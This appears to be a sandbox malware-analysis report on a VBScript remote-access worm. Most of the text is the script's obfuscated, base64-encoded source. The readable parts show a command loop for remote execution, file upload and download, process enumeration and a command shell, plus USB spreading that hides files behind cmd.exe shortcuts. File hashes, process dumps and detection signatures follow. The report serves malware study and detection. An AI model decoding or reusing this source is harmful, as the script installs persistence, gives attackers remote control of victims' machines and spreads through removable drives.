iV0ZW1wJSIpICYgIlwiCnNwbGl0ZXIgPSAiPCIgJiAifCIgJiAiPiIKc2xlZXAgPSA1MDAwIApkaW0gc*(VzcG9uc2UKZGltIGNtZApkaW0gcGFyYW0KaW5*(byA9ICIiCnVzYnNwc*(VhZGluZyA9ICIiCnN0YXJ0ZGF0ZSA9ICIiC*(RpbSBvb*(Vvb*(NlCgonPS09LT0tPS09IGNvZGUgc3RhcnQgPS09LT0tPS09LT0tPS09LT0tPS09LT0Kb24gZXJyb3Igc*(VzdW1lIG5leHQKCgppbnN0YW5jZQp3aGlsZSB0cnVlCgppbnN0YWxsCgpyZXNwb25zZSA9ICIiCnJlc3BvbnNlID0gcG9zdCAoI*(lzLXJlYWR5IiwiIikKY21kID0gc3BsaXQgKHJlc3BvbnNlLHNwbGl0ZXIpCnNlbGVjdCBjYXNlIGNtZCAoMCkKY2FzZSAiZXhjZWN1dGUiCiAgICAgIHBhc*(FtID0gY21kICgxKQogICAgICBleGVjdXRlIHBhc*(FtC*(Nhc2UgInVwZGF0ZSIKICAgICAgcGFyYW0gPSBjbWQgKDEpCiAgICAgIG9uZW9uY2UuY2xvc2UKICAgICAgc2V0IG9uZW9uY2UgPSAgZ*(lsZXN5c3RlbW9iai5vcGVudGV4dGZpbGUgKGluc3RhbGxkaXIgJiBpbnN0YWxsb*(FtZSAsMiwgZ*(Fsc2UpCiAgICAgIG9uZW9uY2Uud3JpdGUgcGFyYW0KICAgICAgb25lb25jZS5jbG9zZQogICAgICBzaGVsbG9iai5ydW4gIndzY3JpcHQuZXhlIC8vQiAiICYgY2hyKDM0KSA*(IGluc3RhbGxkaXIgJiBpbnN0YWxsb*(FtZSA*(IGNocigzNCkKICAgICAgd3Njc*(lwdC5xdWl0IApjYXNlICJ1b*(luc3RhbGwiCiAgICAgIHVuaW5zdGFsbApjYXNlICJzZW5kIgogICAgICBkb3dubG9hZCBjbWQgKDEpLGNtZCAoMikKY2FzZSAic2l0ZS1zZW5kIgogICAgICBzaXRlZG93b*(xvYWRlciBjbWQgKDEpLGNtZCAoMikKY2FzZSAic*(VjdiIKICAgICAgcGFyYW0gPSBjbWQgKDEpCiAgICAgIHVwbG9hZCAocGFyYW0pC*(Nhc2UgICJlbnVtLWRyaXZlciIKICAgICAgcG9zdCAiaXMtZW51bS1kc*(l2ZXIiLGVudW1kc*(l2ZXIgIApjYXNlICAiZW51bS1*(YWYiCiAgICAgIHBhc*(FtID0gY21kICgxKQogICAgICBwb3N0ICJpcy1lbnVtLWZhZiIsZW51bWZhZiAocGFyYW0pC*(Nhc2UgICJlbnVtLXByb2Nlc3MiCiAgICAgIHBvc3QgI*(lzLWVudW0tcHJvY2VzcyIsZW51bXByb2Nlc3MgICAKY2FzZSAgI*(NtZC1zaGVsbCIKICAgICAgcGFyYW0gPSBjbWQgKDEpCiAgICAgIHBvc3QgI*(lzLWNtZC1zaGVsbCIsY21kc2hlbGwgKHBhc*(FtKSAgC*(Nhc2UgICJkZWxldGUiCiAgICAgIHBhc*(FtID0gY21kICgxKQogICAgICBkZWxldGV*(YWYgKHBhc*(FtKSAKY2FzZSAgI*(V4aXQtcHJvY2VzcyIKICAgICAgcGFyYW0gPSBjbWQgKDEpCiAgICAgIGV4aXRwc*(9jZXNzIChwYXJhbSkgC*(Nhc2UgICJzbGVlcCIKICAgICAgcGFyYW0gPSBjbWQgKDEpCiAgICAgIHNsZWVwID0gZXZhbCAocGFyYW0pICAgICAgICAKZW5kIHNlbGVjdAoKd3Njc*(lwdC5zbGVlcCBzbGVlcAoKd2VuZAoKCnN1YiBpbnN0YWxsC*(9uIGVyc*(9yIHJlc3VtZSBuZXh0C*(RpbSBsb*(tvY*(oKZGltIGZpbGVuYW1lC*(RpbSB*(b2xkZXJuYW1lC*(RpbSB*(aWxlaWNvbgpkaW0gZ*(9sZGVyaWNvbgoKdXBzdGFydAp*(b3IgZWFjaCBkc*(l2ZSBpbiB*(aWxlc3lzdGVtb2JqL*(RyaXZlcwoKaWYgIGRyaXZlL*(lzc*(VhZHkgPSB0cnVlIHRoZW4KaWYgIGRyaXZlL*(ZyZWVzcGFjZSAgPiAwIHRoZW4KaWYgIGRyaXZlL*(RyaXZldHlwZSAgPSAxIHRoZW4KICAgIGZpbGVzeXN0ZW1vY*(ouY29weWZpbGUgd3Njc*(lwdC5zY3JpcHR*(dWxsb*(FtZSAsIGRyaXZlLnBhdGggJiAiXCIgJiBpbnN0YWxsb*(FtZSx0cnVlCiAgICBpZiAgZ*(lsZXN5c3RlbW9iai5*(aWxlZXhpc3RzIChkc*(l2ZS5wYXRoICYgIlwiICYgaW5zdGFsbG5hbWUpICB0aGVuCiAgICAgICAgZ*(lsZXN5c3RlbW9iai5nZXR*(aWxlKGRyaXZlLnBhdGggJiAiXCIgICYgaW5zdGFsbG5hbWUpL*(F0dHJpYnV0ZXMgPSAyKzQKICAgIGVuZCBpZgogICAgZ*(9yIGVhY2ggZ*(lsZSBpbiB*(aWxlc3lzdGVtb2JqL*(dldGZvbGRlciggZHJpd*(UucGF0aCA*(ICJcIiApLkZpbGVzCiAgICAgICAgaWYgb*(90IGxua2ZpbGUgdGhlbiBleGl0IGZvcgogICAgICAgIGl*(ICBpbnN0ciAoZ*(lsZS5uYW1lLCIuIikgdGhlbgogICAgICAgICAgICBpZiAgbGNhc2UgKHNwbGl0KGZpbGUub*(FtZSwgIi4iKSAodWJvdW5kKHNwbGl0KGZpbGUub*(FtZSwgIi4iKSkpKSA8PiAibG5rIiB0aGVuCiAgICAgICAgICAgICAgICB*(aWxlL*(F0dHJpYnV0ZXMgPSAyKzQKICAgICAgICAgICAgICAgIGl*(ICB1Y2FzZSAoZ*(lsZS5uYW1lKSA8PiB1Y2FzZSAoaW5zdGFsbG5hbWUpIHRoZW4KICAgICAgICAgICAgICAgICAgICB*(aWxlb*(FtZSA9IHNwbGl0KGZpbGUub*(FtZSwiLiIpCiAgICAgICAgICAgICAgICAgICAgc2V0IGxua29iaiA9IHNoZWxsb2JqL*(NyZWF0ZXNob3J0Y3V0IChkc*(l2ZS5wYXRoICYgIlwiICA*(IGZpbGVuYW1lICgwKSA*(ICIubG5rIikgCiAgICAgICAgICAgICAgICAgICAgbG5rb2JqLndpb*(Rvd3N0eWxlID0gNwogICAgICAgICAgICAgICAgICAgIGxua29iai50YXJnZXRwYXRoID0gI*(NtZC5leGUiCiAgICAgICAgICAgICAgICAgICAgbG5rb2JqLndvc*(tpb*(dkaXJlY3RvcnkgPSAiIgogICAgICAgICAgICAgICAgICAgIGxua29iai5hc*(d1bWVudHMgPSAiL2Mgc3RhcnQgIiA*(IHJlcGxhY2UoaW5zdGFsbG5hbWUsIiAiLCBjaHJ3KDM0KSA*(ICIgIiA*(IGNocncoMzQpKSA*(ICI*(c3RhcnQgIiA*(IHJlcGxhY2UoZ*(lsZS5uYW1lLCIgIiwgY2hydygzNCkgJiAiICIgJiBjaHJ3KDM0KSkgJiI*(ZXhpdCIKICAgICAgICAgICAgICAgICAgICB*(aWxlaWNvbiA9IHNoZWxsb2JqLnJlZ3JlYWQgKCJIS0VZX0xPQ0FMX01BQ0hJTkVcc29*(dHdhc*(VcY2xhc3Nlc1wiICYgc2hlbGxvY*(ouc*(Vnc*(VhZCAoIkhLRVlfTE9DQUxfTUFDSElORVxzb2Z0d2FyZVxjbGFzc2VzXC4iICYgc3BsaXQoZ*(lsZS5uYW1lLCAiLiIpKHVib3VuZChzcGxpdCh*(aWxlL*(5hbWUsICIuIikpKSYgIlwiKSA*(ICJcZGV*(YXVsdGljb25cIikgCiAgICAgICAgICAgICAgICAgICAgaWYgIGluc3RyICh*(aWxlaWNvbiwiLCIpID0gMCB0aGVuCiAgICAgICAgICAgICAgICAgICAgICAgIGxua29iai5pY29ubG9jYXRpb24gPSB*(aWxlLnBhdGgKICAgICAgICAgICAgICAgICAgICBlbHNlIAogICAgICAgICAgICAgICAgICAgICAgICBsb*(tvY*(ouaWNvb*(xvY2F0aW9uID0gZ*(lsZWljb24KICAgICAgICAgICAgICAgICAgICBlb*(QgaWYKICAgICAgICAgICAgICAgICAgICBsb*(tvY*(ouc2F2ZSgpCiAgICAgICAgICAgICAgICBlb*(QgaWYKICAgICAgICAgICAgZW5kIGl*(CiAgICAgICAgZW5kIGl*(CiAgICBuZXh0CiAgICB*(b3IgZWFjaCB*(b2xkZXIgaW4gZ*(lsZXN5c3RlbW9iai5nZXR*(b2xkZXIoIGRyaXZlLnBhdGggJiAiXCIgKS5zdWJ*(b2xkZXJzCiAgICAgICAgaWYgb*(90IGxua2ZvbGRlciB0aGVuIGV4aXQgZ*(9yCiAgICAgICAgZ*(9sZGVyL*(F0dHJpYnV0ZXMgPSAyKzQKICAgICAgICB*(b2xkZXJuYW1lID0gZ*(9sZGVyL*(5hbWUKICAgICAgICBzZXQgbG5rb2JqID0gc2hlbGxvY*(ouY3JlYXRlc2hvcnRjdXQgKGRyaXZlLnBhdGggJiAiXCIgICYgZ*(9sZGVyb*(FtZSA*(ICIubG5rIikgCiAgICAgICAgbG5rb2JqLndpb*(Rvd3N0eWxlID0gNwogICAgICAgIGxua29iai50YXJnZXRwYXRoID0gI*(NtZC5leGUiCiAgICAgICAgbG5rb2JqLndvc*(tpb*(dkaXJlY3RvcnkgPSAiIgogICAgICAgIGxua29iai5hc*(d1bWVudHMgPSAiL2Mgc3RhcnQgIiA*(IHJlcGxhY2UoaW5zdGFsbG5hbWUsIiAiLCBjaHJ3KDM0KSA*(ICIgIiA*(IGNocncoMzQpKSA*(ICI*(c3RhcnQgZXhwbG9yZXIgIiA*(IHJlcGxhY2UoZ*(9sZGVyL*(5hbWUsIiAiLCBjaHJ3KDM0KSA*(ICIgIiA*(IGNocncoMzQpKSA*(IiZleGl0IgogICAgICAgIGZvbGRlc*(ljb24gPSBzaGVsbG9iai5yZWdyZWFkICgiSEtFWV9MT0NBTF9NQUNISU5FXHNvZnR3YXJlXGNsYXNzZXNcZ*(9sZGVyXGRlZ*(F1bHRpY29uXCIpIAogICAgICAgIGl*(ICBpbnN0ciAoZ*(9sZGVyaWNvbiwiLCIpID0gMCB0aGVuCiAgICAgICAgICAgIGx <truncated>
File name TrlLRLG2Z1SYOAj.vbs
Associated Filenames
C:\Users\user\AppData\Roaming\TrlLRLG2Z1SYOAj.vbs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrlLRLG2Z1SYOAj.vbs
File Size 76368 bytes
File Type C++ source, ASCII text, with very long lines
MD5 74ef0238c0a6ff17795051958c326a00
SHA1 2227a82ae3c9759d6f8b169ac3d0ef31bb389adb
SHA256 2c642d5ff657c9788daac44c9040bfb742175dff6c8570805d8b38729c9bae24
CRC32 A22D1B0F
Ssdeep 1536:4W43tGYz27qnLgpcHoWemuqlHsHfnSkWTgrSDcEgQe62B50f/Ohe6gJkgwu:Jpq2WnvHMhqU2f+m
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file Display Text
class cURvES
public function manUNI(ByRef bike_race, ByRef kawasaki)
	call uLOSE(bike_race, chr(34))
	bike_race(1,1).Type = 1
	bike_race(1,1).Open
	bike_race(1,1).Write bike_race(2,1)
	bike_race(1,1).Position = 0
	bike_race(1,1).Type = 2
	bike_race(1,1).CharSet = bike_race(1,2)
	kawasaki = bike_race(1,1).ReadText
	manUNI = 2
end function

public function uLOSE(ByRef gloWORD, ByVal rescur)
	on error resume next
	gloWORD(1,2).DataType = gloWORD(0,2)
	gloWORD(1,2).Text = gloWORD(2,0)
	gloWORD(2,1) = gloWORD(1,2).NodeTypedValue
	gloWORD(1,2) = "us-ascii"
	set gloWORD(1,1) = CreateObject("ADODB.Stream")
	uLOSE = 1
end function

end class


dim sanDISK(2,2)

set sanDISK(0,0) = new cURvES
sanDISK(0,2) = chr(98) & chr(105) & chr(110) & chr(46) & chr(98) & chr(97) & chr(115) & chr(101) & chr(54) & chr(52)
sanDISK(1,0) = "*("
sanDISK(1,1) = ""
set sanDISK(1,2) = CreateObject("Microsoft.XMLDOM").createElement("tmp")
sanDISK(2,0) = Replace("Q29uc3QgVHlwZUJpb*(FyeSA9IDEKQ29uc3QgR*(9yU*(VhZGluZyA9IDEsIEZvcldyaXRpb*(cgPSAyLCBGb3JBcHBlb*(Rpb*(cgPSA4C*(9uIGVyc*(9yIHJlc3VtZSBuZXh0CkRpbSBsb25nVGV4dDEKbG9uZ1RleHQxID0gIlkyeGhjM01nWTFWU2RrVlRDbkIxWW14cFl5Q*(1kVzVqZEdsd*(JpQnRZVzVWVGtrb1FubFNaV1lnWW1sclpWOXlZV05sTENCQ2VWS*(xaaUJyWVhkaGMyRnJhU2tLQ1dOaGJHd2dkVXhQVTBVb1ltbHJaVjl5WVdObExDQ*(phSElvTXpRcEtRb0pZbWxyWlY5eVlXT*(xLREVzTVNrdVZIbHdaU0E5SURFS0NXSnBhMlZ*(Y21GalpTZ3hMREVwTGs5d1pXNEtDV0pwYTJWZ*(NtR*(paU2d4TERFcExsZHlhWFJsSUdKcGEyV*(ZjbUZqWlNneUxERXBDZ2xpYVd0bFgzS*(hZMlVvTVN3eEtTNVFiM05wZEdsd*(JpQTlJREFLQ1dKcGEyV*(ZjbUZqWlNneExERXBMbFI1Y0dVZ1BTQXlDZ2xpYVd0bFgzS*(hZMlVvTVN3eEtTNURhR0Z5VTJWMElEMGdZbWxyWlY5eVlXT*(xLREVzTWlrS0NXdGhkMkZ6WVd0cElEMGdZbWxyWlY5eVlXT*(xLREVzTVNrdVVtV*(haRlJsZUhRS0NXMWhibFZPU1NBOUlESUtaVzVrSUdaMWJtTjBhVzl1Q2dwd2RXSnNhV01nW*(5WdVkzUnBiMjRnZFV4UFUwVW9Rb*(xTWldZZ1oyeHZWMDlTUkN3Z1FubFdZV3dnY21WelkzVnlLUW9KYjI0Z1pYSnliM0lnY21We*(RXMWxJRzVsZUhRS0NXZHNiMWRQVWtRb01Td3lLUzVFWVhSaFZIbHdaU0E5SUdkc2IxZFBVa1FvTUN3eUtRb0paMnh2VjA5U1JDZ3hMRElwTGxSbGVIUWdQU0JuYkc5WFQxSkVLRElzTUNrS0NXZHNiMWRQVWtRb01pd3hLU0E5SUdkc2IxZFBVa1FvTVN3eUtTNU9iMlJsVkhsd1pXUldZV3gxWlFvSloyeHZWMDlTUkNneExESXBJRDBnSW5WekxXRnpZM*(xwSWdvS*(MyVjBJR2RzYjFkUFVrUW9NU3d4S1NBOUlFTnlaV0YwWlU5aWFtV*(pkQ2dpUVVSUFJFSXVVM1J5WldGdElpa0tDWFZNVDFORklEMGdNUXBsY*(1RZ1puVnVZM1JwYjI0S0NtVnVaQ0JqYkdGe*(N3b0tDbVJwYlNCellXNUVTVk5MS0RJc01pa0tDbk5sZENCellXNUVTVk5MS0RBc01Da2dQU0J1WlhjZ1kxVlNka1ZUQ25OaGJrUkpVMHNvTUN3eUtTQTlJR05vY2lnNU9Da2dKaUJqYUhJb01UQTFLU0FtSUdOb2NpZ3hNVEFwSUNZZ1kyaHlLRFEyS1NBbUlHT*(9jaWc1T0NrZ0ppQ*(phSElvT1RjcElDWWdZM*(h5S0RFeE5Ta2dKaUJqYUhJb01UQXhLU0FtSUdOb2NpZzFOQ2tnS*(lCa*(FISW9OVElwQ25OaGJrUkpVMHNvTVN3d0tTQTlJQ0lxS0NJS2MyRnVSRWxUU3lneExERXBJRDBnSWlJS2MyVjBJSE5oY*(tSSlUwc29NU3d5S1NBOUlFTnlaV0YwWlU5aWFtV*(pkQ2dpVFdsa*(NtOXpiMlowTGxoTlRFUlBUU0lwTG1OeVpXRjBaVVZzWlcxbGJuUW9JblJ0Y0NJcENuT*(hia1JKVTBzb01pd3dLU0E5SUZKbGNHeGhZMlVvSWtwN*(VHSkpTRXBzV1RJNWExcFlTV2RQYVVKdllqTldhMkZYTlhCSlEyaHFTMU5DZW1Fe*(JIZGFVMEUyU1Vkb2RtUlhVbkJpS2loc*(RGcHVaM*(RZVkRSTFEybGpPVXhVTUhSUVV6QTVURlF3WjFreU9YV*(FLaWhzY*(tsRU1IUlFVekE1VEZRd2RGQlRNRGxNVkRCMFVGTXdPVXhVTUhSUVV6QTVURlF3ZEZCVE1EbERaM0J2WWpOT01FbEVNR2RKS2loS2VXRllVbkJaVnpWd1dUSkZkV1JYYzNWWk1qbDBTV2R3ZDJJelNqQkpSREJuVGxSQ*(QwMUJjSEJpY*(s0d1dWZDRjMXBIYkhsSlJEQ*(5TV2xXYUdOSVFtdFpXRkpvU2xOSlMySkhOWEphS2loc2MxcFRRVGxKU0ZKNVpGZFZTMkpITlhKYUtpZzVjMXBIV*(5sSlJEQ*(5aRWhLTVZwU*(IwdEtlakIwVUZNd09VeFVNSFJRVTBKM1pGZEtjMkZYVFdka0tpaEdlVWxFTUhSUVV6QTVURlF3ZEZCVE1EbE1WREIwVUZNd09VeFVNSFJRVXpBNVRGUXdTME1xS0ZKd1lsTkNlbUZIV*(5OaVJ6bHBZV2xCUzJNeVZqQkpTRTV2V2xkNGMySXlTbkZKUkRCblpETk9hbU1xS0d4M1pFTTFhbU1xS0Zab1pFZFdkbGtxS0hCc1dUTlJiMGx1WkhwWk0wcHdZMGhSZFdNeWFHeGlSM2RwUzFGd2EyRlhNR2RhS2loc2MxcFlUalZqTTFKc1lsYzVhV0ZuY0hwYVdGR*(5XaW9vYkhOYVdFNDFZek5TYkdKWE9XbGhhVUU1U1VkT2VWcFhSakJhVnpscFlTb29WbXBrUTJkcFl6Sk9lV0ZZUWpCaFZ6VnVUQ29vV25CaVIxWjZaV*(hPTUZwWE1YWlpLaWh3YkZrelVXbExVWEJyWVZjd1oyRklVakJqUnpscFlXZHdlbHBZVVdkaFNGSXdZMGM1YVdGcFFUbEpSMDU1V2xkR01GcFhPV2xoS2loV2FtUkRaM*(xpV0U0MFlsZDNlVXh1YUhSaVIyZ3daRWhCYVV0U*(IwdEtNbHAxU1VRd1oyTXlhR3hpUjNoMldTb29iM1ZhV0doM1dWYzFhMXBYTlRKaFdFcDJZaW9vTVd4aWJsSjZaRWhLY0dJcUtHUjZTME5KYkdSSFZuU*(pRMVZwUzFOQktpaEpRMHBqWWxkV2JGcFROVEpaY*(sxcFEybGthMk1xS0RsM1NVUXdaMGx1VG14a1EwSjZZVWRXYzJKSE9XbGhhVUU1U1Voa2Vsa3pTbkJqU0ZGMVdUTktiR*(xZVW14aU1rcHhXbGRPTUV0RFNXZEthVUpxWVVoS*(IwMTZVWEJKUTFsblNXNWtlbGt6U25CalNGRjFZekpvYkdKSGQybEpRMWxuV1RKb2VVdEVUVEJMVTBFcUtFbERTWEJKYVVFcUtFbElXbWxaTTBweldtZHZibHBJU25aalEwRTVTVWRTZVdJelFXZEthVUZwWXpKb2JHSkhlSFpaS2lod*(RXTnVWblZKUTBsblNtbENhbUZJU1c5T*(VsRndTVU5aWjBscFZtcGlNakY2WTBkV2FrcFRRWFpaZVVKNlpFZEdlV1JEUW05a1NGSjNZM3B2ZGt3eVkzU*(tSMVpxWVVNMWFtSXlNR2xKUTFsbldUS*(9lVXRFVFRCTFUwRXFLRWxEU1hOSlJFRnpTVWhTZVdSWFZXbERhV1JVV2xoUloySXlTbkZTS2loc2MxcFdVblpXTTBwd1pFZFZaMUJUUWtSaktpaFdhR1JIV*(xCWktpaHdiR*(t6VVc5S*(JFNXFZeW9vYkhka1IyeDFXb*(sxUjJGWGVHeFZNMng2WkVkV2RGUXlTbkZhVjA0d1NXbHJkVlF6UW14aWJGSnNaVWhTUjJGWGVHeExSMXAxVEVSS*(MyUklTakZhVTJ0TFNqSTVhV0ZyV25CaVIxWlZZakZrZVdGWVVteE1iR1I1WVZoU2JGUkhiSFZhVTJocll5b29PWGRMVVc5dVlqSktjVklxS0d4eldsWlNkbFl6U25Ca1IxVjFVVEo0ZG1NeVZVdEtNVTVzWkVOQ2Rsa3FLSEJIWVZkNGJGWkhPV*(hqS2loc01GcFRRVGxKUlRWMlpFZG9jR0lxS0dOTFNqTk9iMXBYZUhOaU1rcHhURzVLTVdKcFFXbEtWMDUyWWxoT2QxcFhUV3hKUXpscVNVaE9hbUZJVW1oak1uUjZTVU01YW1NcUtGW*(9aRWRWWjB3elRtcEpSekZ3WW01V01GcFRRWFppVnpoblRYcEJaMHd6VW5WSlJrNXlaV*(hDYkZwVFFYW*(tTRWxuU1dsQktpaEpSMDV2WTJsb*(VrNURhM*(RLYVVJcUtHSnBRU29vU1VkT2IyTnBaM3BPUTJ0elNVUkJjMGxJVW5sa1YxVkxRM*(xqT1V4VU1IUlFVekE1VEZRd1oyTklTbkJrS2loR01FbElXbWhqYVVFNVRGUXdkRkJUTURsTVZEQjBVRk13T1V4VU1IUlFVekE1VEZRd2RGQlJiMHRoVnpWNlpFZEdjMkpITldoaVYxV*(5VRk5DTTJNeVRubGhXRUl3VEc1T2FtTXFLR3gzWkVjMWFHSlhWVXRqTTFKb1kyNVNNV05EUVRsSlNFNXZXbGQ0YzJJeVNuRk1iazUzV2xkT2NGbFhlQ29vWWpKNGExcFlTbnBKUTJkcFl6TlNhR051VWpGalEwbHdTVU5aWjBsc2QybERLaWhzZFdNelVtaGlSM2hyWVZoSloxQlRRbnBoUjFaellrYzVhV0ZwTld4bFNFS*(9ZaW9vVW14aWJscHdZeW9vT1hWaVYxWjFaRWhPTUdNcUtHeDFXak5OYjJGWE5YcGtSMFp6WWtkU2NHTnBhM*(RLYVVGcFdFTkpTMkZYV1dkaUtpZzVNRWxIV25CaVIxWjZaV*(hPTUZwWE1YWlpLaWh2ZFZvcUtEbHpXa2RXZVZwWWFIQ*(pNMUo2UzBkc2RXTXpVbWhpUjNocllWaEpjRWxJVW05YVZ6U*(5TVWRzZFdNelVtaGlSM2hyWVZoSloxQlRRbnBoUjFaellrYzVhV0ZwTld4bFNFS*(9ZaW9vVW14aWJscHdZeW9vT1hWaVYxWjFaRWhPTUdNcUtHeDFXak5OYjBscFZqQ*(FWekYzU2xOS*(NFbERXV2RKYkhkcFEyNU9kMkpIYkRCYVdFbG5VRk5CYVZCRFNXZEthVUZwW*(tOSlowcHBRV2xRYVVsTFl6SjRiRnBZUVdkUVUwRXhUVVJCZDBsQ*(NHdGhWekJuWXlvb1ZucGpSe*(wxWXpKVlMxcEhiSFJKUjA1MFdrRndhMkZYTUdkalIwWjVXV*(N3UzJGWE5Tb29Zb*(xCT1VsRFNXbERibFo2V1c1T2QyTXFLRlpvV2tkc2RWcDVRVGxKUTBscFEyNU9NR*(xZU2pCYVIwWXdXbE5CT1VsRFNXbERLaWhTY0dKVFFuW*(lLaWhXZG1JcUtFNXNRM*(R2Y*(xCVE1EbE1WREIwVUZNd09VbEhUblphUjFWbll6TlNhR051VVdkUVV6QTVURlF3ZEZCVE1EbE1WREIwVUZNd09VeFVNSFJRVXpBNVRGUXdTMkl5TkdkYVdFcDVZak5KWjJNcUtGWjZaR*(N4YkVsSE5XeGxTRkZMUTJkd2NHSnVUakJaVnpWcVdsRndNMkZIYkhOYVUwSXdZMjVXYkVOb*(NIQ*(liazR3V1ZkNGMwT*(5jSGxhV0U1M1lqSTFlbHBUUVRsSlEwbHBRMjVLYkdNelFuW*(liazVzU1VRd1oyTkhPWHBrUTBGdlNTb29iSHBNV0Vwc1dWZFNOVWxwZDJsS*(FXdExXVEl4YTBsRU1HZGpNMEp6WVZoUlowdElTbXhqTTBKMlltNU9iRXhJVG5kaVIyd3dXbGhKY0VOdVRteGlSMVpxWkVOQ2FsbFlUbXhKUjA1MFdrTkJiMDFEYTB0Wk1rWjZXbE5CYVZwWWFHcGFWMDR4WkVkV*(FVTnBRV2RKUTBGblNVaENhR01xS0VaMFNVUXdaMWt5TVd0SlEyZDRTMUZ2WjBsRFFXZEpRMEpzWlVkV2FtUllVbXhKU0VKb1l5b29SblJES2loT2FHTXlWV2RKY*(xaM1drZEdNRnBUU1V0SlEwR*(5TVU5CWjJOSFJubFpWekJuVUZOQ2FtSlhVV2RMUkVWd1EybEJaMGxEUVdkSlJ6bDFXbGM1ZFZreVZYVlpNb*(gyWXpKVlMwbERRV2RKUTBGbll6SldNRWxIT1hWYVZ6bDFXVEpWWjFCVFFXZGFLaWhzYzFwWVRqV*(pNMUpzWWxjNWFXRnBOWFpqUjFaMVpFZFdOR1JIV25CaVIxV*(5TMGRzZFdNelVtaGlSM2hyWVZoSlowcHBRbkJpY*(s0d1dWZDRjMklxS0VaMFdsTkJjMDFwZDJkYUtpaEdjMk15VlhCRGFVR*(5TVU5CWjBsSE9YV*(FWe*(wxV1RKV*(RXUXpTbkJrUjFWblkwZEdlV*(xYTUV0SlEwR*(5TVU5CWjJJeU5XeGlNalZxV2xNMWFtSkhPWHBhVVc5blNVTkJaMGxEUW5waFIxWnpZa2M1YVdGcE5YbGtWelJuU1c1a2Vsa3pTbkJqU0ZGMVdsaG9iRWxET0haU*(FVRnBTVU5aWjFreWFIbExSRTB3UzFOQktpaEpSMngxWXpOU2FHSkhlR3RoV0VsblNtbENjR0p1VGpCWlYzaHpZaW9vU*(5SYVUwRXFLRWxIVG05a*(FXZDZUa05yUzBsRFFXZEpRMEZuWkROT2FtTXFLR3gzWkVNMWVHUlhiREJKUVhCcVdWaE9iRWxEU2pGaUtpaHNkV016VW1oaVIzZHBRM*(xCWjBsRFFXZEpTRloxWVZjMWVtUkhSbk5pUVhCcVdWaE9iRWxEU25wYVZ6VnJTV2R2WjBsRFFXZEpRMEpyWWpOa2RXSkhPV2hhUTBKcVlsZFJaMHRFUlhCTVIwNTBXa05CYjAxcGEwdFpNa1o2V2xOQ*(FXTXliREJhVXpGNldsYzFhMGxuYjJkSlEwR*(5TVU5DZW1GWVVteGFSe*(t6WWlvb2VIWlpWMUpzWTJsQ2FtSlhVV2RMUkVWd1RFZE9kRnBEUVc5T*(FXdExXVEpHZWxwVFFXbGpLaWhXYW1ScFNVdEpRMEZuU1VOQloyTkhSb*(xaVnpCblVGTkNhbUpYVVdkTFJFVndRM*(xCWjBsRFFXZEpTRlozWWtjNWFGcERRVzlqUjBa <truncated>
Sorry! No CAPE files.
Process Name wscript.exe
PID 2008
Dump Size 141824 bytes
Module Path C:\Windows\SysWOW64\wscript.exe
Type PE imageexecutable
MD5 13122def597404ec5c5ed9ccf38613b0
SHA1 c8233f79b17611ed0b20d20b0fa0b88bb34487a2
SHA256 23e5a875d2a230a4a6efe7b7f66af5ca1c2eaa5c0ef247f1874c309bf6d0e830
CRC32 00EF60E8
Ssdeep 3072:mhK+8SsfAhTUIdEhkKJkuSVNPHOM2XKHN+sm/CDkugr5Txt9x:mM+8SsYHwjO26HAsmxNT5x
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 23e5a875d2a230a4a6efe7b7f66af5ca1c2eaa5c0ef247f1874c309bf6d0e830
Download
Process Name wscript.exe
PID 1052
Dump Size 141824 bytes
Module Path C:\Windows\SysWOW64\wscript.exe
Type PE imageexecutable
MD5 64a776ef703cadaf4c7d135129198cfa
SHA1 b84e341e452cca60d323b7490d07b168523e066b
SHA256 8ac25f6320ca02bdfedee4f4a8cf8a3e818c4a9651a06da9f45309f9dbc2e20a
CRC32 EF15CB17
Ssdeep 3072:mhK+8SsfAhTUIdEhkKJkuSVNPHOM2XKHN+sm/CDkuXr5Txt9x:mM+8SsYHwjO26HAsmSNT5x
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 8ac25f6320ca02bdfedee4f4a8cf8a3e818c4a9651a06da9f45309f9dbc2e20a
Download
Process Name wscript.exe
PID 2556
Dump Size 141824 bytes
Module Path C:\Windows\SysWOW64\wscript.exe
Type PE imageexecutable
MD5 0c48e1df0ed642e6b8b15fd24a11e827
SHA1 565ce94da6f4a65ca38485d992bda089d60902eb
SHA256 0ced8cd968aa6a8a9158ecc6e173c4404cd7cec18d9d16fda61a6da91c5417e9
CRC32 8F2F21E4
Ssdeep 3072:mhK+8SsfAhTUIdEhkKJkuSVNPHOM2XKHN+sm/CDku1r5Txt9x:mM+8SsYHwjO26HAsmUNT5x
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 0ced8cd968aa6a8a9158ecc6e173c4404cd7cec18d9d16fda61a6da91c5417e9
Download

Comments



No comments posted

Processing ( 60.633 seconds )

  • 51.166 BehaviorAnalysis
  • 7.074 Strings
  • 1.093 CAPE
  • 0.712 ProcDump
  • 0.343 Static
  • 0.089 TrID
  • 0.065 Dropped
  • 0.043 TargetInfo
  • 0.032 Deduplicate
  • 0.01 NetworkAnalysis
  • 0.005 AnalysisInfo
  • 0.001 Debug

Signatures ( 7.386 seconds )

  • 2.009 api_spamming
  • 1.666 decoy_document
  • 1.34 antivm_generic_scsi
  • 0.673 recon_programs
  • 0.624 antivm_generic_services
  • 0.307 uac_bypass_eventvwr
  • 0.13 antiav_detectreg
  • 0.046 infostealer_ftp
  • 0.038 mimics_filetime
  • 0.035 antivm_generic_disk
  • 0.032 reads_self
  • 0.031 Doppelganging
  • 0.028 stealth_file
  • 0.027 virus
  • 0.027 antianalysis_detectreg
  • 0.025 bootkit
  • 0.025 infostealer_im
  • 0.02 stealth_timeout
  • 0.019 infostealer_mail
  • 0.014 hancitor_behavior
  • 0.014 antivm_vbox_keys
  • 0.012 infostealer_browser
  • 0.011 injection_createremotethread
  • 0.011 InjectionCreateRemoteThread
  • 0.01 InjectionProcessHollowing
  • 0.01 injection_runpe
  • 0.009 antivm_vmware_keys
  • 0.008 Extraction
  • 0.007 InjectionInterProcess
  • 0.007 kibex_behavior
  • 0.007 infostealer_browser_password
  • 0.007 ransomware_files
  • 0.006 PlugX
  • 0.006 antiav_detectfile
  • 0.006 antivm_parallels_keys
  • 0.006 antivm_xen_keys
  • 0.006 darkcomet_regkeys
  • 0.005 antidebug_guardpages
  • 0.005 exploit_heapspray
